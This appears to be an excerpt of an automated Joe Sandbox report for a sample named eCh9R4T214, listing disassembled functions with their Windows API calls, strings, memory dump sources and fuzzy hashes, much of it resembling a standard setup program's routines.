                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                            • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                            • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                            • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                            APIs
                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                            • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                            • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                            • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 52b5b48316c5d4ae37ce8577e0a97d76e0e4998a9a2ed84e03e9d155575d1481
                                                            • Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
                                                            • Opcode Fuzzy Hash: 52b5b48316c5d4ae37ce8577e0a97d76e0e4998a9a2ed84e03e9d155575d1481
                                                            • Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
                                                            APIs
                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                            • 73E9A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                            • 73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                            • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: MetricsSystem$A570A6310DeleteObject
                                                            • String ID:
                                                            • API String ID: 3435189566-0
                                                            • Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                            • Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
                                                            • Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                            • Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
                                                            APIs
                                                              • Part of subcall function 0045D3B0: SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738D5
                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738EB
                                                            Strings
                                                            • Setting permissions on registry key: %s\%s, xrefs: 0047389A
                                                            • Could not set permissions on the registry key because it currently does not exist., xrefs: 004738DF
                                                            • Failed to set permissions on registry key (%d)., xrefs: 004738FC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                            • API String ID: 1452528299-4018462623
                                                            • Opcode ID: 65c899866a6f92bdc558b75d1f6f5c8f40dffa86cd9e0ff42c768141b597e19f
                                                            • Instruction ID: 0e56c8fb080e82cb73bff42131c1910bc7e2d1be1188aa0d4929b19add272574
                                                            • Opcode Fuzzy Hash: 65c899866a6f92bdc558b75d1f6f5c8f40dffa86cd9e0ff42c768141b597e19f
                                                            • Instruction Fuzzy Hash: D42186B0A046485FCB00DFA9C8816EEBBE5DF49315F50817BE508E7392D7B85A05CB6A
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 262959230-0
                                                            • Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                            • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                            • Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                            • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                            APIs
                                                            • 73E98830.GDI32(00000000,00000000,00000000), ref: 00414429
                                                            • 73E922A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
                                                            • 73E98830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
                                                            • 73E922A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
                                                            • 73E9A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: E922E98830$A480
                                                            • String ID:
                                                            • API String ID: 3692852386-0
                                                            • Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                            • Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
                                                            • Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                            • Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
                                                            APIs
                                                            • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                            • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                            • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Enum$NameOpenResourceUniversal
                                                            • String ID: Z
                                                            • API String ID: 3604996873-1505515367
                                                            • Opcode ID: eb416ea4a1b8f2daa77fdd812f136362b1db0fd9b9a9c64830d5574e342882dc
                                                            • Instruction ID: 2ace50d644c075eff23e32fa5e1ddfe03b8fa53596be5d4ceb5675c655e146ae
                                                            • Opcode Fuzzy Hash: eb416ea4a1b8f2daa77fdd812f136362b1db0fd9b9a9c64830d5574e342882dc
                                                            • Instruction Fuzzy Hash: C0513070E04218ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE418F5A
                                                            APIs
                                                            • SetRectEmpty.USER32(?), ref: 0044D05E
                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D089
                                                            • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D111
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: DrawText$EmptyRect
                                                            • String ID:
                                                            • API String ID: 182455014-2867612384
                                                            • Opcode ID: 9bd908fd6ab002ebc51c141ad104fc93549b6590cb61d9638f2d60c2e4f6398c
                                                            • Instruction ID: 2c2bbb7fbf4b59eae95d31c7b28000ca71a9f0321ec4255fb332cd8a4a3f7a8e
                                                            • Opcode Fuzzy Hash: 9bd908fd6ab002ebc51c141ad104fc93549b6590cb61d9638f2d60c2e4f6398c
                                                            • Instruction Fuzzy Hash: F6516071E00244AFDB10DFA5C885BDEBBF8AF49308F08847AE845EB255D778A945CB64
                                                            APIs
                                                            • 73E9A570.USER32(00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EFAE
                                                              • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                            • SelectObject.GDI32(?,00000000), ref: 0042EFD1
                                                            • 73E9A480.USER32(00000000,?,0042F0BD,00000000,0042F0B6,?,00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000), ref: 0042F0B0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: A480A570CreateFontIndirectObjectSelect
                                                            • String ID: ...\
                                                            • API String ID: 2998766281-983595016
                                                            • Opcode ID: da53642769cbe036028c7dc5c32fe254f1027efce08608ae13d670d4fc685408
                                                            • Instruction ID: 4ea51e63949933808241df29427b07dd96e06abf1a704ffa26f869fa6ec4a11f
                                                            • Opcode Fuzzy Hash: da53642769cbe036028c7dc5c32fe254f1027efce08608ae13d670d4fc685408
                                                            • Instruction Fuzzy Hash: 2F315270B00128ABDF11EF96D841BAEB7B8EB48708FD1447BF410A7292D7785D49CA59
                                                            APIs
                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateFileHandle
                                                            • String ID: .tmp$_iu
                                                            • API String ID: 3498533004-10593223
                                                            • Opcode ID: dc109c8f01286b2989461901934a6d9e01325b966eab87418c3e389b569fc91a
                                                            • Instruction ID: 4fa05f029f2566c48aedd37e5d2d112a05e3774389c58111587f2dbaaee79b9c
                                                            • Opcode Fuzzy Hash: dc109c8f01286b2989461901934a6d9e01325b966eab87418c3e389b569fc91a
                                                            • Instruction Fuzzy Hash: 9531A6B0A40149ABCF01EF95C982B9EBBB5AF44345F50452AF800B72C2D6785F058AAD
                                                            APIs
                                                            • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                            • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                            • RegisterClassA.USER32(?), ref: 004164DE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Class$InfoRegisterUnregister
                                                            • String ID: @
                                                            • API String ID: 3749476976-2766056989
                                                            • Opcode ID: 8cb808bfaf21f9b6be1f4599df9655a946cb93d0bbb2725194c7e4a3bd3b9422
                                                            • Instruction ID: 7ea39428e622c43f80c69b44bdb33f9ce6dea52ad5211df5dc1c1138561595a4
                                                            • Opcode Fuzzy Hash: 8cb808bfaf21f9b6be1f4599df9655a946cb93d0bbb2725194c7e4a3bd3b9422
                                                            • Instruction Fuzzy Hash: 0E318E706042009BD760EF68C981B9B77E5AB88308F04457FF985DB392DB39D9848B6A
                                                            APIs
                                                            • GetFileAttributesA.KERNEL32(00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C50
                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C79
                                                            • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00497C92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$Move
                                                            • String ID: isRS-%.3u.tmp
                                                            • API String ID: 3839737484-3657609586
                                                            • Opcode ID: 9f18e9119b438212db1bb595c56ccc89a7930ded87602de0aca2db56358788ed
                                                            • Instruction ID: 213244b736f3eff521ec2db090c728ece63042f248bf50699bdf4cb02408e53f
                                                            • Opcode Fuzzy Hash: 9f18e9119b438212db1bb595c56ccc89a7930ded87602de0aca2db56358788ed
                                                            • Instruction Fuzzy Hash: 53214171E14219AFCF05EFA9C881AAFBBB8AB44714F50453BB814B72D1D6385E018B69
                                                            APIs
                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                            • ExitProcess.KERNEL32 ref: 00404E0D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ExitMessageProcess
                                                            • String ID: Error$Runtime error at 00000000
                                                            • API String ID: 1220098344-2970929446
                                                            • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                            • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                            • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                            • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                            APIs
                                                              • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                            • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A88
                                                            • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456AB5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                            • String ID: LoadTypeLib$RegisterTypeLib
                                                            • API String ID: 1312246647-2435364021
                                                            • Opcode ID: 384f0062f956a7e6e5f729262f076ec348bfef461e3db0757be0fdeeca084a77
                                                            • Instruction ID: 5567ca09ff2ddd9e87874ef4cfa4ab968baaa8f1c3db1669d027a8a21fc87fa6
                                                            • Opcode Fuzzy Hash: 384f0062f956a7e6e5f729262f076ec348bfef461e3db0757be0fdeeca084a77
                                                            • Instruction Fuzzy Hash: 20119331B00604AFDB11EFA6CD55A5EB7BDEB8A705B51C4B6BC04E3652DA389E04CB24
                                                            APIs
                                                            • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456FA6
                                                            • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00457043
                                                            Strings
                                                            • Failed to create DebugClientWnd, xrefs: 0045700C
                                                            • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FD2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                            • API String ID: 3850602802-3720027226
                                                            • Opcode ID: e461573c832d53d536b60bdd09be1689879239ada0565844d92a82a55e03096e
                                                            • Instruction ID: 61f5065308a022425a12d25e559eb7300ab1b4b0d104b50eccf394a1c4e119f6
                                                            • Opcode Fuzzy Hash: e461573c832d53d536b60bdd09be1689879239ada0565844d92a82a55e03096e
                                                            • Instruction Fuzzy Hash: 921123706082509BD300AB689C82B5F7BD89B55719F45403BF9859B3C3D7798C08C7AE
                                                            APIs
                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000,00495E13), ref: 00495DDE
                                                            • CloseHandle.KERNEL32(x^I,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000), ref: 00495DF5
                                                              • Part of subcall function 00495CC8: GetLastError.KERNEL32(00000000,00495D60,?,?,?,?), ref: 00495CEC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorHandleLastProcess
                                                            • String ID: D$x^I
                                                            • API String ID: 3798668922-903578107
                                                            • Opcode ID: 39c0d8672a1bce61a407111d09c5e91ba0fa0ceca0774959188b9b62fea67dd3
                                                            • Instruction ID: 0d7d1bccb2b79611993d32b5dcf50d38d0c3e5c5098d5d0063742a7482510134
                                                            • Opcode Fuzzy Hash: 39c0d8672a1bce61a407111d09c5e91ba0fa0ceca0774959188b9b62fea67dd3
                                                            • Instruction Fuzzy Hash: F201A1B1604648AFDF01EBA2DC42E9FBBACDF08704F60003AF904E72C1D6385E008A28
                                                            APIs
                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                            • GetFocus.USER32 ref: 00478673
                                                            • GetKeyState.USER32(0000007A), ref: 00478685
                                                            • WaitMessage.USER32(?,00000000,004786AC,?,00000000,004786D3,?,?,00000001,00000000,?,?,?,0047FED4,00000000,00480D8E), ref: 0047868F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
